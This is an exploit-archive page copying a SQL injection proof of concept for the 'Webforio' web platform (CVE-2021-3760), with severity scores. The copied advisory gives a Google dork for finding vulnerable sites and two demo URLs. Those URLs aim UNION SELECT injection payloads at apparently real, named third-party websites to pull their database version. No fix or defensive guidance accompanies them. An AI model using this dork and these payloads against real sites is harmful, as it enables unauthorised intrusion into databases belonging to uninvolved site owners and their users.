Advertisement






Webforio - Sql Injection Vulnerability

CVE Category Price Severity
CVE-2021-3760 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-08-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 0.52192 0.70148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080084

Below is a copy:

Webforio - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Webforio -  Sql Injection Vulnerability
#Date: 2021-08-21
#Exploit Author: Behrouz Mansoori
#Google Dork: "Development Webforio"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Development Webforio"


### Demo :

https://www.omcentertainments.com/service-details.html?foo=-9%20union%20select%201,version(),3,4,5--

https://www.artomc.com/art.php?id=-7%20union%20select%201,2,3,4,version(),6,7,8,%209--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum